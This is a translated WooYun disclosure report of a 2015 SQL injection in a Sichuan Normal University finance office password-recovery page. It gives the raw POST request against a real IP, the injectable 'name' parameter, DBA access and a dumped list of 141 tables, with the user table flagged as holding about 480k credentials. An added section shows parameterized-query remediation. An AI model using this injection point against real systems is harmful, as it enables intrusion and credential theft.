Vulnerability summary

Vulnerability ID: wooyun-2015-0147516

Title: SQL injection at Sichuan Normal University leads to disclosure of the entire database

Vendor: sicnu.edu.cn

Author: 云袭2001

Submitted: 2015-10-19 11:32

Fixed: 2015-12-05 14:44

Disclosed: 2015-12-05 14:44

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org


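Vulnerability details

Disclosure status:

2015-10-19: Details reported to the vendor; awaiting vendor handling
2015-10-21: Vendor confirmed; details disclosed to the vendor only
2015-10-31: Details disclosed to core white hats and experts in related fields
2015-11-10: Details disclosed to regular white hats
2015-11-20: Details disclosed to intern white hats
2015-12-05: Details disclosed to the public

Brief description:

See title.

Detailed description:

OK, this time it's the Planning and Finance Office.
A single injection point leads to disclosure of the entire database. The Planning and Finance Office's database... ahem... there really is a lot in it.

Proof of vulnerability:

Injection via POST: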

POST /pages/User/findPass.do HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://202.115.200.140:8082/pages/User/findPass.do
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 202.115.200.140:8082
Content-Length: 26
Pragma: no-cache
Cookie: JSESSIONID=C251CAB5EB301A27961B08521B281697

id=&step=1&name=2014110306


The name parameter is injectable.

1.png


DBA privileges:

2.png


21 databases:

3.png


Let's look at one of them.
STUDENT database: 141 tables

Database: STUDENT
[141 tables]
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| ZT_CJ_INFO_CHANGE | 11105462|
| S_UPDATELOG | 4365071 |
| SF_QFDB | 1826115 |
| SF_YSK | 1826115 |
| SF_SFDMX | 1618157 |
| SF_ZZ | 713811 |
| SF_SFDB | 543828 |
| ZWXMJE | 509639 |
| USER_ROLE | 486181 |
| S_USER | 486065 | these are the accounts and passwords, 480k rows
| JZJ_FFSJ | 402865 |
| ZWPZB | 274624 |
| SF_XSQF | 252711 |
| PXSJZ | 244328 |
| JZJ_ZCXX | 209501 |
| PXSDM | 208953 |
| DG_JCKJS | 110653 |
| ZWNEW_ZWXMZD | 90834 |
| SF_SFDMX_BAK | 79660 |
| ZWXMZD | 62732 |
| ONLINE_USER | 61196 |
| JZJ_ZCXX_EDIT | 57781 |
| ZT_CJ_INFO | 52200 |
| SF_TFDMX | 48180 |
| SF_TFDB | 42495 |
| TB_JWXT | 35472 |
| TB_CJXT | 35421 |
| TB_YJSXT | 35421 |
| CJ_FP_FY_YFP | 30172 |
| S_USER_INFO | 26738 |
| JZJ_ZCXX_UPDATE | 26505 |
| CJ_FP_DK | 24991 |
| TEMP_XJXH | 9670 |
| JZJ_CHECK_HIS | 7726 |
| DG_JCK | 7701 |
| ZC_RESULT_BAK | 7341 |
| PBJDM | 5983 |
| ZWKMZD | 5490 |
| ZC_RESULT_BAK_20131001 | 4978 |
| PZGDM | 4530 |
| SF_JMDMX | 3665 |
| SF_JMDB | 3611 |
| SUGGEST | 2767 |
| GUEST | 2266 |
| PZGQX | 1364 |
| CW_JZJ_BAK | 1204 |
| PZYDM_NEW | 1093 |
| ZC_RESULT | 1043 |
| TB_YXXT | 958 |
| CJ_ZY_SFXM | 942 |
| ZWBMZD | 832 |
| ROLE_RESOURCE | 618 |
| ZWPZBH | 582 |
| ZWNEW_ZWKMZD | 578 |
| CJ_FPBL | 551 |
| JZJ_BASE | 541 |
| ZC_RESULT20131105 | 487 |
| ZC_RESULT_2013004 | 487 |
| ZT_CJ_ZY_CHANGE | 415 |
| CJ_FP_MX | 331 |
| NEWSINFO | 260 |
| S_RESOURCE | 196 |
| ZWNEW_ZWXMLX | 194 |
| CJ_YSKDM | 175 |
| MYTEMP | 157 |
| ZWNEW_ZWBMZD | 110 |
| PBMDM | 101 |
| ZGBM | 76 |
| PSFXM | 68 |
| CW_ZXDK_GJ_BAK | 60 |
| ZWNEW_ZWXMLB | 41 |
| CJ_BXXS | 36 |
| JZJ_FFSJ_BAK | 34 |
| PSFQJ | 33 |
| CJ_BJDM | 31 |
| CW_FZZ | 24 |
| S_ROLE | 24 |
| PXSXZ | 21 |
| CJ_FZBMDM | 18 |
| DBCONFIG | 16 |
| NEWSTYPE | 16 |
| PXSLY | 14 |
| DM_BASE_STATUS | 13 |
| JZJ_XMLX | 11 |
| BMLINK | 10 |
| QRTZ_CRON_TRIGGERS | 10 |
| QRTZ_JOB_DETAILS | 10 |
| QRTZ_TRIGGERS | 10 |
| TB_PZGDM | 10 |
| SMS_OTHER_SEND | 9 |
| PPYCC | 8 |
| PXSZT | 8 |
| CW_ZXDK_GJ | 7 |
| DM_FFDXLX | 7 |
| USER_TYPE | 7 |
| JZJ_BASE_BAK | 6 |
| WEBARGS | 6 |
| CW_INIT | 5 |
| DM_ZJXZ | 5 |
| QRTZ_LOCKS | 5 |
| ZC_ID | 5 |
| ZXDK_GJ_BAK | 5 |
| CJ_JD_XS | 4 |
| CJ_LX | 4 |
| DM_FFSJ_ISSH | 4 |
| PYHDM | 4 |
| CJ_BXMS | 3 |
| CW_ZXDK_SYD | 3 |
| JZJ_FFFS | 3 |
| P_MEMO | 3 |
| TB_JZJ_FFSJ | 3 |
| ZXDK_GJ | 3 |
| ZXDK_SYD | 3 |
| SMS_OTHER_SEND_BAK | 2 |
| ZC_FILE | 2 |
| ZXDK_SYD_BAK | 2 |
| CJ_FP_DM_SFND | 1 |
| CJ_FPBL_MEMO | 1 |
| SMS_CONFIG | 1 |
+------------------------+---------+


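I won't spell out the other information in the databases.

Fix:

The impact this time is pretty serious, I'd say.

Copyright notice: please credit the source when reposting: 云袭2001@WooYun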
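The report's fix section gives no remediation, so the following is an added example (not part of the original report and not the vendor's code) of a hardened handler for the `step=1` lookup behind `findPass.do`: the `name` value is checked against an allow-list and then passed to the query as a bound parameter. The Python/sqlite3 stand-in, the `s_user` columns, the function names and the name format are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: account names are short alphanumeric IDs like the 10-digit
# value in the reported request; adjust the pattern to the real format.
NAME_RE = re.compile(r"[0-9A-Za-z]{1,20}")


def make_demo_db():
    """Constructed in-memory stand-in; table columns are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE s_user (name TEXT PRIMARY KEY, email TEXT)")
    db.execute("INSERT INTO s_user VALUES (?, ?)",
               ("2014110306", "student@example.edu"))
    return db


def account_exists(db, name):
    """Look the account up with a bound parameter.

    The value is bound as data, so quotes or SQL keywords inside it
    are compared literally and never become part of the statement.
    """
    row = db.execute("SELECT 1 FROM s_user WHERE name = ?", (name,)).fetchone()
    return row is not None


def find_pass_step1(db, body):
    """Handle the form body of the step=1 request; returns (status, found)."""
    form = parse_qs(body, keep_blank_values=True)
    names = form.get("name", [])
    # Reject a missing or repeated parameter and any value outside the
    # allow-list before it reaches the database layer.
    if len(names) != 1 or not NAME_RE.fullmatch(names[0]):
        return 400, False
    return 200, account_exists(db, names[0])


if __name__ == "__main__":
    db = make_demo_db()
    print(find_pass_step1(db, "id=&step=1&name=2014110306"))     # well-formed
    print(find_pass_step1(db, "id=&step=1&name=2014110306%27"))  # stray quote
```

Because the report also shows the injected connection holding DBA privileges, the application's database account should be restricted to the tables this lookup needs.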


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-10-21 14:42

Vendor reply:

Thanks for your support!

Latest status:

None yet

